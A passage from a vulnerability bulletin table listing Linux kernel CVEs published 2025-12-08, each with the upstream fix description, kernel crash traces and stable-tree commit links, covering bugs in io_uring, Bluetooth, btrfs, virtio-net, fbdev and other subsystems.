__pfx_pollwake+0x10/0x10 ? __rseq_handle_notify_resume+0xad/0x4c0 ? restore_fpregs_from_fpstate+0x3c/0x90 ? switch_fpu_return+0x5b/0xe0 ? do_syscall_64+0x204/0x2f0 ? do_syscall_64+0x204/0x2f0 ? do_syscall_64+0x204/0x2f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> [...] Kernel panic - not syncing: Fatal exception in interrupt Kernel Offset: 0x1c000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) Instead use the skb destructor_arg pointer along with pointer tagging. As pointers are always aligned to 8B, use the bottom bit to indicate whether this a single address or an allocated struct containing several addresses. | 2025-12-08 | not yet calculated | CVE-2025-40290 | https://git.kernel.org/stable/c/c5ea2e50b5c9aa80c5b53526257540f0c26cd66d https://git.kernel.org/stable/c/0ebc27a4c67d44e5ce88d21cdad8201862b78837 https://bugs.debian.org/1118437 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix regbuf vector size truncation There is a report of io_estimate_bvec_size() truncating the calculated number of segments that leads to corruption issues. Check it doesn't overflow "int"s used later. Rough but simple, can be improved on top. | 2025-12-08 | not yet calculated | CVE-2025-40291 | https://git.kernel.org/stable/c/826ce37a842633efe1bb763e4b13045d74060d72 https://git.kernel.org/stable/c/146eb58629f45f8297e83d69e64d4eea4b28d972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-net: fix received length check in big packets Since commit 4959aebba8c0 ("virtio-net: use mtu size as buffer length for big packets"), when guest gso is off, the allocated size for big packets is not MAX_SKB_FRAGS * PAGE_SIZE anymore but depends on negotiated MTU. The number of allocated frags for big packets is stored in vi->big_packets_num_skbfrags. Because the host announced buffer length can be malicious (e.g. the host vhost_net driver's get_rx_bufs is modified to announce incorrect length), we need a check in virtio_net receive path. Currently, the check is not adapted to the new change which can lead to NULL page pointer dereference in the below while loop when receiving length that is larger than the allocated one. This commit fixes the received length check corresponding to the new change. | 2025-12-08 | not yet calculated | CVE-2025-40292 | https://git.kernel.org/stable/c/82f9028e83944a9eee5229cbc6fee9be1de8a62d https://git.kernel.org/stable/c/946dec89c41726b94d31147ec528b96af0be1b5a https://git.kernel.org/stable/c/82fe78065450d2d07f36a22e2b6b44955cf5ca5b https://git.kernel.org/stable/c/3e9d89f2ecd3636bd4cbdfd0b2dfdaf58f9882e2 https://git.kernel.org/stable/c/0c716703965ffc5ef4311b65cb5d84a703784717 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Don't overflow during division for dirty tracking If pgshift is 63 then BITS_PER_TYPE(*bitmap->bitmap) * pgsize will overflow to 0 and this triggers divide by 0. In this case the index should just be 0, so reorganize things to divide by shift and avoid hitting any overflows. | 2025-12-08 | not yet calculated | CVE-2025-40293 | https://git.kernel.org/stable/c/07105e61882ff4a7d58db63cc5f9e90c6c60506c https://git.kernel.org/stable/c/4c8a4f1d34eced168cc0b3a3dfe7b6dcc2090f69 https://git.kernel.org/stable/c/de7f2c67ceb1941b05b04ac35458a03e93cc57b1 https://git.kernel.org/stable/c/dbf316fc90aa954dcd5440817f4b944627ed63e0 https://git.kernel.org/stable/c/cb30dfa75d55eced379a42fd67bd5fb7ec38555e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix OOB access in parse_adv_monitor_pattern() In the parse_adv_monitor_pattern() function, the value of the 'length' variable is currently limited to HCI_MAX_EXT_AD_LENGTH(251). The size of the 'value' array in the mgmt_adv_pattern structure is 31. If the value of 'pattern[i].length' is set in the user space and exceeds 31, the 'patterns[i].value' array can be accessed out of bound when copied. Increasing the size of the 'value' array in the 'mgmt_adv_pattern' structure will break the userspace. Considering this, and to avoid OOB access revert the limits for 'offset' and 'length' back to the value of HCI_MAX_AD_LENGTH. Found by InfoTeCS on behalf of Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-08 | not yet calculated | CVE-2025-40294 | https://git.kernel.org/stable/c/96616530f524a0a76248cd44201de0a9e8526190 https://git.kernel.org/stable/c/5f7350ff2b179764a4f40ba4161b60b8aaef857b https://git.kernel.org/stable/c/4b7d4aa5399b5a64caee639275615c63c008540d https://git.kernel.org/stable/c/3a50d59b3781bc3a4e96533612509546a4c309a7 https://git.kernel.org/stable/c/8d59fba49362c65332395789fd82771f1028d87e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fscrypt: fix left shift underflow when inode->i_blkbits > PAGE_SHIFT When simulating an nvme device on qemu with both logical_block_size and physical_block_size set to 8 KiB, an error trace appears during partition table reading at boot time. The issue is caused by inode->i_blkbits being larger than PAGE_SHIFT, which leads to a left shift of -1 and triggering a UBSAN warning. [ 2.697306] ------------[ cut here ]------------ [ 2.697309] UBSAN: shift-out-of-bounds in fs/crypto/inline_crypt.c:336:37 [ 2.697311] shift exponent -1 is negative [ 2.697315] CPU: 3 UID: 0 PID: 274 Comm: (udev-worker) Not tainted 6.18.0-rc2+ #34 PREEMPT(voluntary) [ 2.697317] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 2.697320] Call Trace: [ 2.697324] <TASK> [ 2.697325] dump_stack_lvl+0x76/0xa0 [ 2.697340] dump_stack+0x10/0x20 [ 2.697342] __ubsan_handle_shift_out_of_bounds+0x1e3/0x390 [ 2.697351] bh_get_inode_and_lblk_num.cold+0x12/0x94 [ 2.697359] fscrypt_set_bio_crypt_ctx_bh+0x44/0x90 [ 2.697365] submit_bh_wbc+0xb6/0x190 [ 2.697370] block_read_full_folio+0x194/0x270 [ 2.697371] ? __pfx_blkdev_get_block+0x10/0x10 [ 2.697375] ? __pfx_blkdev_read_folio+0x10/0x10 [ 2.697377] blkdev_read_folio+0x18/0x30 [ 2.697379] filemap_read_folio+0x40/0xe0 [ 2.697382] filemap_get_pages+0x5ef/0x7a0 [ 2.697385] ? mmap_region+0x63/0xd0 [ 2.697389] filemap_read+0x11d/0x520 [ 2.697392] blkdev_read_iter+0x7c/0x180 [ 2.697393] vfs_read+0x261/0x390 [ 2.697397] ksys_read+0x71/0xf0 [ 2.697398] __x64_sys_read+0x19/0x30 [ 2.697399] x64_sys_call+0x1e88/0x26a0 [ 2.697405] do_syscall_64+0x80/0x670 [ 2.697410] ? __x64_sys_newfstat+0x15/0x20 [ 2.697414] ? x64_sys_call+0x204a/0x26a0 [ 2.697415] ? do_syscall_64+0xb8/0x670 [ 2.697417] ? irqentry_exit_to_user_mode+0x2e/0x2a0 [ 2.697420] ? irqentry_exit+0x43/0x50 [ 2.697421] ? exc_page_fault+0x90/0x1b0 [ 2.697422] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 2.697425] RIP: 0033:0x75054cba4a06 [ 2.697426] Code: 5d e8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 75 19 83 e2 39 83 fa 08 75 11 e8 26 ff ff ff 66 0f 1f 44 00 00 48 8b 45 10 0f 05 <48> 8b 5d f8 c9 c3 0f 1f 40 00 f3 0f 1e fa 55 48 89 e5 48 83 ec 08 [ 2.697427] RSP: 002b:00007fff973723a0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000 [ 2.697430] RAX: ffffffffffffffda RBX: 00005ea9a2c02760 RCX: 000075054cba4a06 [ 2.697432] RDX: 0000000000002000 RSI: 000075054c190000 RDI: 000000000000001b [ 2.697433] RBP: 00007fff973723c0 R08: 0000000000000000 R09: 0000000000000000 [ 2.697434] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000 [ 2.697434] R13: 00005ea9a2c027c0 R14: 00005ea9a2be5608 R15: 00005ea9a2be55f0 [ 2.697436] </TASK> [ 2.697436] ---[ end trace ]--- This situation can happen for block devices because when CONFIG_TRANSPARENT_HUGEPAGE is enabled, the maximum logical_block_size is 64 KiB. set_init_blocksize() then sets the block device inode->i_blkbits to 13, which is within this limit. File I/O does not trigger this problem because for filesystems that do not support the FS_LBS feature, sb_set_blocksize() prevents sb->s_blocksize_bits from being larger than PAGE_SHIFT. During inode allocation, alloc_inode()->inode_init_always() assigns inode->i_blkbits from sb->s_blocksize_bits. Currently, only xfs_fs_type has the FS_LBS flag, and since xfs I/O paths do not reach submit_bh_wbc(), it does not hit the left-shift underflow issue. [EB: use folio_pos() and consolidate the two shifts by i_blkbits] | 2025-12-08 | not yet calculated | CVE-2025-40295 | https://git.kernel.org/stable/c/dde026c5d2a5870f97924d5b512adf2b93fb7153 https://git.kernel.org/stable/c/1e39da974ce621ed874c6d3aaf65ad14848c9f0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: int3472: Fix double free of GPIO device during unregister regulator_unregister() already frees the associated GPIO device. On ThinkPad X9 (Lunar Lake), this causes a double free issue that leads to random failures when other drivers (typically Intel THC) attempt to allocate interrupts. The root cause is that the reference count of the pinctrl_intel_platform module unexpectedly drops to zero when this driver defers its probe. This behavior can also be reproduced by unloading the module directly. Fix the issue by removing the redundant release of the GPIO device during regulator unregistration. | 2025-12-08 | not yet calculated | CVE-2025-40296 | https://git.kernel.org/stable/c/b8113bb56c45bd17bac5144b55591f9cdbd6aabe https://git.kernel.org/stable/c/f0f7a3f542c1698edb69075f25a3f846207facba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix use-after-free due to MST port state bypass syzbot reported[1] a use-after-free when deleting an expired fdb. It is due to a race condition between learning still happening and a port being deleted, after all its fdbs have been flushed. The port's state has been toggled to disabled so no learning should happen at that time, but if we have MST enabled, it will bypass the port's state, that together with VLAN filtering disabled can lead to fdb learning at a time when it shouldn't happen while the port is being deleted. VLAN filtering must be disabled because we flush the port VLANs when it's being deleted which will stop learning. This fix adds a check for the port's vlan group which is initialized to NULL when the port is getting deleted, that avoids the port state bypass. When MST is enabled there would be a minimal new overhead in the fast-path because the port's vlan group pointer is cache-hot. [1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be | 2025-12-08 | not yet calculated | CVE-2025-40297 | https://git.kernel.org/stable/c/e19085b2a86addccff33ab8536fc67ebd9d52198 https://git.kernel.org/stable/c/3b60ce334c1ce8b3fad7e02dcd5ed9f6646477c8 https://git.kernel.org/stable/c/bf3843183bc3158e5821b46f330c438ae9bd6ddb https://git.kernel.org/stable/c/991fbe1680cd41a5f97c92cd3a3496315df36e4b https://git.kernel.org/stable/c/8dca36978aa80bab9d4da130c211db75c9e00048 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: Implement settime64 with -EOPNOTSUPP ptp_clock_settime() assumes every ptp_clock has implemented settime64(). Stub it with -EOPNOTSUPP to prevent a NULL dereference. | 2025-12-08 | not yet calculated | CVE-2025-40298 | https://git.kernel.org/stable/c/c9efb03ff4fae0bc7e5ef3323c3aab599cb4c88a https://git.kernel.org/stable/c/329d050bbe63c2999f657cf2d3855be11a473745 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: Implement gettimex64 with -EOPNOTSUPP gve implemented a ptp_clock for sole use of do_aux_work at this time. ptp_clock_gettime() and ptp_sys_offset() assume every ptp_clock has implemented either gettimex64 or gettime64. Stub gettimex64 and return -EOPNOTSUPP to prevent NULL dereferencing. | 2025-12-08 | not yet calculated | CVE-2025-40299 | https://git.kernel.org/stable/c/96ec90412ceb58c73fd3714e40ab2cee1eedac3b https://git.kernel.org/stable/c/6ab753b5d8e521616cd9bd10b09891cbeb7e0235 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: validate skb length for unknown CC opcode In hci_cmd_complete_evt(), if the command complete event has an unknown opcode, we assume the first byte of the remaining skb->data contains the return status. However, parameter data has previously been pulled in hci_event_func(), which may leave the skb empty. If so, using skb->data[0] for the return status uses un-init memory. The fix is to check skb->len before using skb->data. | 2025-12-08 | not yet calculated | CVE-2025-40301 | https://git.kernel.org/stable/c/fea895de78d3bb2f0c09db9f10b18f8121b15759 https://git.kernel.org/stable/c/779f83a91d4f1bf5ddfeaf528420cbb6dbf03fa8 https://git.kernel.org/stable/c/cf2c2acec1cf456c3d11c11a7589e886a0f963a9 https://git.kernel.org/stable/c/1a0ddaaf97405dbd11d4cb5a961a3f82400e8a50 https://git.kernel.org/stable/c/5c5f1f64681cc889d9b13e4a61285e9e029d6ab5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: videobuf2: forbid remove_bufs when legacy fileio is active vb2_ioctl_remove_bufs() call manipulates queue internal buffer list, potentially overwriting some pointers used by the legacy fileio access mode. Forbid that ioctl when fileio is active to protect internal queue state between subsequent read/write calls. | 2025-12-08 | not yet calculated | CVE-2025-40302 | https://git.kernel.org/stable/c/a6a493b985bfffac097a4e1be09f98b27729dca8 https://git.kernel.org/stable/c/e819b34df0a7030a15c968d619fa8a3ed2455c7a https://git.kernel.org/stable/c/27afd6e066cfd80ddbe22a4a11b99174ac89cced |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: ensure no dirty metadata is written back for an fs with errors [BUG] During development of a minor feature (make sure all btrfs_bio::end_io() is called in task context), I noticed a crash in generic/388, where metadata writes triggered new works after btrfs_stop_all_workers(). It turns out that it can even happen without any code modification, just using RAID5 for metadata and the same workload from generic/388 is going to trigger the use-after-free. [CAUSE] If btrfs hits an error, the fs is marked as error, no new transaction is allowed thus metadata is in a frozen state. But there are some metadata modifications before that error, and they are still in the btree inode page cache. Since there will be no real transaction commit, all those dirty folios are just kept as is in the page cache, and they can not be invalidated by invalidate_inode_pages2() call inside close_ctree(), because they are dirty. And finally after btrfs_stop_all_workers(), we call iput() on btree inode, which triggers writeback of those dirty metadata. And if the fs is using RAID56 metadata, this will trigger RMW and queue new works into rmw_workers, which is already stopped, causing warning from queue_work() and use-after-free. [FIX] Add a special handling for write_one_eb(), that if the fs is already in an error state, immediately mark the bbio as failure, instead of really submitting them. Then during close_ctree(), iput() will just discard all those dirty tree blocks without really writing them back, thus no more new jobs for already stopped-and-freed workqueues. The extra discard in write_one_eb() also acts as an extra safenet. E.g. the transaction abort is triggered by some extent/free space tree corruptions, and since extent/free space tree is already corrupted some tree blocks may be allocated where they shouldn't be (overwriting existing tree blocks). In that case writing them back will further corrupting the fs. | 2025-12-08 | not yet calculated | CVE-2025-40303 | https://git.kernel.org/stable/c/066ee13f05fbd82ada01883e51f0695172f98dff https://git.kernel.org/stable/c/e2b3859067bf012d53c49b3f885fef40624a2c83 https://git.kernel.org/stable/c/54a5b5a15588e3b0b294df31474d08a2678d4291 https://git.kernel.org/stable/c/2618849f31e7cf51fadd4a5242458501a6d5b315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds Add bounds checking to prevent writes past framebuffer boundaries when rendering text near screen edges. Return early if the Y position is off-screen and clip image height to screen boundary. Break from the rendering loop if the X position is off-screen. When clipping image width to fit the screen, update the character count to match the clipped width to prevent buffer size mismatches. Without the character count update, bit_putcs_aligned and bit_putcs_unaligned receive mismatched parameters where the buffer is allocated for the clipped width but cnt reflects the original larger count, causing out-of-bounds writes. | 2025-12-08 | not yet calculated | CVE-2025-40304 | https://git.kernel.org/stable/c/996bfaa7372d6718b6d860bdf78f6618e850c702 https://git.kernel.org/stable/c/f0982400648a3e00580253e0c48e991f34d2684c https://git.kernel.org/stable/c/1943b69e87b0ab35032d47de0a7fca9a3d1d6fc1 https://git.kernel.org/stable/c/ebc0730b490c7f27340b1222e01dd106e820320d https://git.kernel.org/stable/c/86df8ade88d290725554cefd03101ecd0fbd3752 https://git.kernel.org/stable/c/15ba9acafb0517f8359ca30002c189a68ddbb939 https://git.kernel.org/stable/c/2d1359e11674ed4274934eac8a71877ae5ae7bbb https://git.kernel.org/stable/c/3637d34b35b287ab830e66048841ace404382b67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p/trans_fd: p9_fd_request: kick rx thread if EPOLLIN p9_read_work() doesn't set Rworksched and doesn't do schedule_work(m->rq) if list_empty(&m->req_list). However, if the pipe is full, we need to read more data and this used to work prior to commit aaec5a95d59615 ("pipe_read: don't wake up the writer if the pipe is still full"). p9_read_work() does p9_fd_read() -> ... -> anon_pipe_read() which (before the commit above) triggered the unnecessary wakeup. This wakeup calls p9_pollwake() which kicks p9_poll_workfn() -> p9_poll_mux(), p9_poll_mux() will notice EPOLLIN and schedule_work(&m->rq). This no longer happens after the optimization above, change p9_fd_request() to use p9_poll_mux() instead of only checking for EPOLLOUT. | 2025-12-08 | not yet calculated | CVE-2025-40305 | https://git.kernel.org/stable/c/2e1461034aef99e905a1fe5589aaf00eaea73eee https://git.kernel.org/stable/c/242531004d7de8c159f9bfadebe33fe8060b1046 https://git.kernel.org/stable/c/e8fe3f07a357c39d429e02ca34f740692d88967a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: orangefs: fix xattr related buffer overflow... Willy Tarreau <w@1wt.eu> forwarded me a message from Disclosure <disclosure@aisle.com> with the following warning: > The helper `xattr_key()` uses the pointer variable in the loop condition > rather than dereferencing it. As `key` is incremented, it remains non-NULL > (until it runs into unmapped memory), so the loop does not terminate on > valid C strings and will walk memory indefinitely, consuming CPU or hanging > the thread. I easily reproduced this with setfattr and getfattr, causing a kernel oops, hung user processes and corrupted orangefs files. Disclosure sent along a diff (not a patch) with a suggested fix, which I based this patch on. After xattr_key started working right, xfstest generic/069 exposed an xattr related memory leak that lead to OOM. xattr_key returns a hashed key. When adding xattrs to the orangefs xattr cache, orangefs used hash_add, a kernel hashing macro. hash_add also hashes the key using hash_log which resulted in additions to the xattr cache going to the wrong hash bucket. generic/069 tortures a single file and orangefs does a getattr for the xattr "security.capability" every time. Orangefs negative caches on xattrs which includes a kmalloc. Since adds to the xattr cache were going to the wrong bucket, every getattr for "security.capability" resulted in another kmalloc, none of which were ever freed. I changed the two uses of hash_add to hlist_add_head instead and the memory leak ceased and generic/069 quit throwing furniture. | 2025-12-08 | not yet calculated | CVE-2025-40306 | https://git.kernel.org/stable/c/c6564ff6b53c9a8dc786b6f1c51ae7688273f931 https://git.kernel.org/stable/c/ef892d2bf4f3fa2c8de1677dd307e678bdd3d865 https://git.kernel.org/stable/c/15afebb9597449c444801d1ff0b8d8b311f950ab https://git.kernel.org/stable/c/bc812574de633cf9a9ad6974490e45f6a4bb5126 https://git.kernel.org/stable/c/e09a096104fc65859422817fb2211f35855983fe https://git.kernel.org/stable/c/9127d1e90c90e5960c8bc72a4ce2c209691a7021 https://git.kernel.org/stable/c/c2ca015ac109fd743fdde27933d59dc5ad46658e https://git.kernel.org/stable/c/025e880759c279ec64d0f754fe65bf45961da864 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: validate cluster allocation bits of the allocation bitmap syzbot created an exfat image with cluster bits not set for the allocation bitmap. exfat-fs reads and uses the allocation bitmap without checking this. The problem is that if the start cluster of the allocation bitmap is 6, cluster 6 can be allocated when creating a directory with mkdir. exfat zeros out this cluster in exfat_mkdir, which can delete existing entries. This can reallocate the allocated entries. In addition, the allocation bitmap is also zeroed out, so cluster 6 can be reallocated. This patch adds exfat_test_bitmap_range to validate that clusters used for the allocation bitmap are correctly marked as in-use. | 2025-12-08 | not yet calculated | CVE-2025-40307 | https://git.kernel.org/stable/c/6bc58b4c53795ab5fe00648344aa7d9d61175f90 https://git.kernel.org/stable/c/13c1d24803d5b0446b3f6f0fdd67e07ac1fdc7bf https://git.kernel.org/stable/c/79c1587b6cda74deb0c86fc7ba194b92958c793c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: bcsp: receive data only if registered Currently, bcsp_recv() can be called even when the BCSP protocol has not been registered. This leads to a NULL pointer dereference, as shown in the following stack trace: KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f] RIP: 0010:bcsp_recv+0x13d/0x1740 drivers/bluetooth/hci_bcsp.c:590 Call Trace: <TASK> hci_uart_tty_receive+0x194/0x220 drivers/bluetooth/hci_ldisc.c:627 tiocsti+0x23c/0x2c0 drivers/tty/tty_io.c:2290 tty_ioctl+0x626/0xde0 drivers/tty/tty_io.c:2706 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f To prevent this, ensure that the HCI_UART_REGISTERED flag is set before processing received data. If the protocol is not registered, return -EUNATCH. | 2025-12-08 | not yet calculated | CVE-2025-40308 | https://git.kernel.org/stable/c/39a7d40314b6288cfa2d13269275e9247a7a055a https://git.kernel.org/stable/c/164586725b47f9d61912e6bf17dbaffeff11710b https://git.kernel.org/stable/c/b65ca9708bfbf47d8b7bd44b7c574bd16798e9c9 https://git.kernel.org/stable/c/8b892dbef3887dbe9afdc7176d1a5fd90e1636aa https://git.kernel.org/stable/c/799cd62cbcc3f12ee04b33ef390ff7d41c37d671 https://git.kernel.org/stable/c/b420a4c7f915fc1c94ad1f6ca740acc046d94334 https://git.kernel.org/stable/c/55c1519fca830f59a10bbf9aa8209c87b06cf7bc https://git.kernel.org/stable/c/ca94b2b036c22556c3a66f1b80f490882deef7a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix UAF on sco_conn_free BUG: KASAN: slab-use-after-free in sco_conn_free net/bluetooth/sco.c:87 [inline] BUG: KASAN: slab-use-after-free in kref_put include/linux/kref.h:65 [inline] BUG: KASAN: slab-use-after-free in sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107 Write of size 8 at addr ffff88811cb96b50 by task kworker/u17:4/352 CPU: 1 UID: 0 PID: 352 Comm: kworker/u17:4 Not tainted 6.17.0-rc5-g717368f83676 #4 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: hci13 hci_cmd_sync_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x10b/0x170 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x191/0x550 mm/kasan/report.c:482 kasan_report+0xc4/0x100 mm/kasan/report.c:595 sco_conn_free net/bluetooth/sco.c:87 [inline] kref_put include/linux/kref.h:65 [inline] sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107 sco_connect_cfm+0xb4/0xae0 net/bluetooth/sco.c:1441 hci_connect_cfm include/net/bluetooth/hci_core.h:2082 [inline] hci_conn_failed+0x20a/0x2e0 net/bluetooth/hci_conn.c:1313 hci_conn_unlink+0x55f/0x810 net/bluetooth/hci_conn.c:1121 hci_conn_del+0xb6/0x1110 net/bluetooth/hci_conn.c:1147 hci_abort_conn_sync+0x8c5/0xbb0 net/bluetooth/hci_sync.c:5689 hci_cmd_sync_work+0x281/0x380 net/bluetooth/hci_sync.c:332 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0x77e/0x1040 kernel/workqueue.c:3319 worker_thread+0xbee/0x1200 kernel/workqueue.c:3400 kthread+0x3c7/0x870 kernel/kthread.c:463 ret_from_fork+0x13a/0x1e0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 31370: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x30/0x70 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x82/0x90 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4382 [inline] __kmalloc_noprof+0x22f/0x390 mm/slub.c:4394 kmalloc_noprof include/linux/slab.h:909 [inline] sk_prot_alloc+0xae/0x220 net/core/sock.c:2239 sk_alloc+0x34/0x5a0 net/core/sock.c:2295 bt_sock_alloc+0x3c/0x330 net/bluetooth/af_bluetooth.c:151 sco_sock_alloc net/bluetooth/sco.c:562 [inline] sco_sock_create+0xc0/0x350 net/bluetooth/sco.c:593 bt_sock_create+0x161/0x3b0 net/bluetooth/af_bluetooth.c:135 __sock_create+0x3ad/0x780 net/socket.c:1589 sock_create net/socket.c:1647 [inline] __sys_socket_create net/socket.c:1684 [inline] __sys_socket+0xd5/0x330 net/socket.c:1731 __do_sys_socket net/socket.c:1745 [inline] __se_sys_socket net/socket.c:1743 [inline] __x64_sys_socket+0x7a/0x90 net/socket.c:1743 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xc7/0x240 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 31374: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x30/0x70 mm/kasan/common.c:68 kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:576 poison_slab_object mm/kasan/common.c:243 [inline] __kasan_slab_free+0x3d/0x50 mm/kasan/common.c:275 kasan_slab_free include/linux/kasan.h:233 [inline] slab_free_hook mm/slub.c:2428 [inline] slab_free mm/slub.c:4701 [inline] kfree+0x199/0x3b0 mm/slub.c:4900 sk_prot_free net/core/sock.c:2278 [inline] __sk_destruct+0x4aa/0x630 net/core/sock.c:2373 sco_sock_release+0x2ad/0x300 net/bluetooth/sco.c:1333 __sock_release net/socket.c:649 [inline] sock_close+0xb8/0x230 net/socket.c:1439 __fput+0x3d1/0x9e0 fs/file_table.c:468 task_work_run+0x206/0x2a0 kernel/task_work.c:227 get_signal+0x1201/0x1410 kernel/signal.c:2807 arch_do_signal_or_restart+0x34/0x740 arch/x86/kernel/signal.c:337 exit_to_user_mode_loop+0x68/0xc0 kernel/entry/common.c:40 exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline] s ---truncated--- | 2025-12-08 | not yet calculated | CVE-2025-40309 | https://git.kernel.org/stable/c/57707135755bd78b1fe5acaebb054fba4739e14c https://git.kernel.org/stable/c/c17caff1062ca91ebac44bfd01d2fb3d99dc0e23 https://git.kernel.org/stable/c/d2850f037c2ae75882d68ae654d546ff5c0f678c https://git.kernel.org/stable/c/c419674cc74309ffaabc591e7200efb49a18fccd https://git.kernel.org/stable/c/03371c0218189b185595b65a04dad60076ca9718 https://git.kernel.org/stable/c/ed10dddc7df2daaf2a4d98a972aac5183e738cc0 https://git.kernel.org/stable/c/391f83547b7b2c63e4b572ab838e10a06cfa4425 https://git.kernel.org/stable/c/ecb9a843be4d6fd710d7026e359f21015a062572 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw There is race in amdgpu_amdkfd_device_fini_sw and interrupt. if amdgpu_amdkfd_device_fini_sw run in b/w kfd_cleanup_nodes and kfree(kfd), and KGD interrupt generated. kernel panic log: BUG: kernel NULL pointer dereference, address: 0000000000000098 amdgpu 0000:c8:00.0: amdgpu: Requesting 4 partitions through PSP PGD d78c68067 P4D d78c68067 kfd kfd: amdgpu: Allocated 3969056 bytes on gart PUD 1465b8067 PMD @ Oops: @002 [#1] SMP NOPTI kfd kfd: amdgpu: Total number of KFD nodes to be created: 4 CPU: 115 PID: @ Comm: swapper/115 Kdump: loaded Tainted: G S W OE K RIP: 0010:_raw_spin_lock_irqsave+0x12/0x40 Code: 89 e@ 41 5c c3 cc cc cc cc 66 66 2e Of 1f 84 00 00 00 00 00 OF 1f 40 00 Of 1f 44% 00 00 41 54 9c 41 5c fa 31 cO ba 01 00 00 00 <fO> OF b1 17 75 Ba 4c 89 e@ 41 Sc 89 c6 e8 07 38 5d RSP: 0018: ffffc90@1a6b0e28 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000018 0000000000000001 RSI: ffff8883bb623e00 RDI: 0000000000000098 ffff8883bb000000 RO8: ffff888100055020 ROO: ffff888100055020 0000000000000000 R11: 0000000000000000 R12: 0900000000000002 ffff888F2b97da0@ R14: @000000000000098 R15: ffff8883babdfo00 CS: 010 DS: 0000 ES: 0000 CRO: 0000000080050033 CR2: 0000000000000098 CR3: 0000000e7cae2006 CR4: 0000000002770ce0 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 0000000000000000 DR6: 00000000fffeO7FO DR7: 0000000000000400 PKRU: 55555554 Call Trace: <IRQ> kgd2kfd_interrupt+@x6b/0x1f@ [amdgpu] ? amdgpu_fence_process+0xa4/0x150 [amdgpu] kfd kfd: amdgpu: Node: 0, interrupt_bitmap: 3 YcpxFl Rant tErace amdgpu_irq_dispatch+0x165/0x210 [amdgpu] amdgpu_ih_process+0x80/0x100 [amdgpu] amdgpu: Virtual CRAT table created for GPU amdgpu_irq_handler+0x1f/@x60 [amdgpu] __handle_irq_event_percpu+0x3d/0x170 amdgpu: Topology: Add dGPU node [0x74a2:0x1002] handle_irq_event+0x5a/@xcO handle_edge_irq+0x93/0x240 kfd kfd: amdgpu: KFD node 1 partition @ size 49148M asm_call_irq_on_stack+0xf/@x20 </IRQ> common_interrupt+0xb3/0x130 asm_common_interrupt+0x1le/0x40 5.10.134-010.a1i5000.a18.x86_64 #1 | 2025-12-08 | not yet calculated | CVE-2025-40310 | https://git.kernel.org/stable/c/93f8d67ef8b50334a26129df4da5a4cb60ad4090 https://git.kernel.org/stable/c/bc9e789053abe463f8cf74eee5fc2f157c11a79f https://git.kernel.org/stable/c/2f89a2d15550b653caaeeab7ab68c4d7583fd4fe https://git.kernel.org/stable/c/99d7181bca34e96fbf61bdb6844918bdd4df2814 |
